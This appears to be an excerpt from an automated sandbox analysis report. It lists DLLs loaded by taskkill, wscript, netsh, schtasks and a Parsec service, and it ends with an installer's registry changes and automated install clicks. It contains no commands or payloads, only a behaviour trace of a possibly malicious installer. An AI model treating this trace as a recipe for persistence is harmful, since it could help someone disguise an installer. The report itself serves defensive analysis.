Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: slc.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: slc.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ifmon.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mprapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasmontr.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mfc42u.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: authfwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: firewallapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwbase.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dhcpcmonitor.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dot3cfg.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dot3api.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: onex.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: eappcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: eappprxy.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: hnetmon.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: netshell.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: netsetupapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: netiohlp.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nshhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: httpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nshipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: activeds.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: polstore.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: winipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: adsldpc.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nshwfp.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: p2pnetsh.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: p2p.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rpcnsh.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: whhelper.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wlancfg.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wlanapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wshelper.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wevtapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: peerdistsh.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wcmapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rmclient.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mobilenetworking.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: slc.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ktmw32.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mprmsg.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ifmon.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mprapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasmontr.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mfc42u.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: authfwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: firewallapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwbase.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dhcpcmonitor.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dot3cfg.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dot3api.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: onex.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: eappcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: eappprxy.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: hnetmon.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: netshell.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: netsetupapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: netiohlp.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nshhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: httpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nshipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: activeds.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: polstore.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: winipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: adsldpc.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nshwfp.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: p2pnetsh.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: p2p.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rpcnsh.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: whhelper.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wlancfg.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wlanapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wshelper.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wevtapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: peerdistsh.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wcmapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rmclient.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mobilenetworking.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: slc.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ktmw32.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mprmsg.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ifmon.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mprapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasmontr.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mfc42u.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: authfwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: firewallapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwbase.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dhcpcmonitor.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dot3cfg.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dot3api.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: onex.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: eappcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: eappprxy.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: hnetmon.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: netshell.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: netsetupapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: netiohlp.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nshhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: httpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nshipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: activeds.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: polstore.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: winipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: adsldpc.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: adsldpc.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nshwfp.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: p2pnetsh.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: p2p.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rpcnsh.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: whhelper.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wlancfg.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wlanapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wshelper.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wevtapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: peerdistsh.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wcmapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rmclient.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mobilenetworking.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: slc.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ktmw32.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mprmsg.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: slc.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: slc.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Program Files\Parsec\pservice.exe | Section loaded: apphelp.dll
Source: C:\Program Files\Parsec\pservice.exe | Section loaded: wtsapi32.dll
Source: C:\Program Files\Parsec\pservice.exe | Section loaded: msi.dll
Source: C:\Program Files\Parsec\pservice.exe | Section loaded: sas.dll
Source: C:\Program Files\Parsec\pservice.exe | Section loaded: windows.storage.dll
Source: C:\Program Files\Parsec\pservice.exe | Section loaded: wldp.dll
Source: C:\Program Files\Parsec\pservice.exe | Section loaded: msasn1.dll
Source: C:\Program Files\Parsec\pservice.exe | Section loaded: cryptsp.dll
Source: C:\Program Files\Parsec\pservice.exe | Section loaded: rsaenh.dll
Source: C:\Program Files\Parsec\pservice.exe | Section loaded: cryptbase.dll
Source: C:\Program Files\Parsec\pservice.exe | Section loaded: gpapi.dll
Source: C:\Program Files\Parsec\pservice.exe | Section loaded: cryptnet.dll
Source: C:\Program Files\Parsec\pservice.exe | Section loaded: profapi.dll
Source: C:\Program Files\Parsec\pservice.exe | Section loaded: iphlpapi.dll
Source: C:\Program Files\Parsec\pservice.exe | Section loaded: winnsi.dll
Source: C:\Program Files\Parsec\pservice.exe | Section loaded: winhttp.dll
Source: C:\Program Files\Parsec\pservice.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files\Parsec\pservice.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
Source: Parsec.lnk.13.dr | LNK file: ..\..\..\..\..\..\Program Files\Parsec\parsecd.exe
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | Window found: window name: TMainForm
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | Automated click: Next
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | Automated click: Install
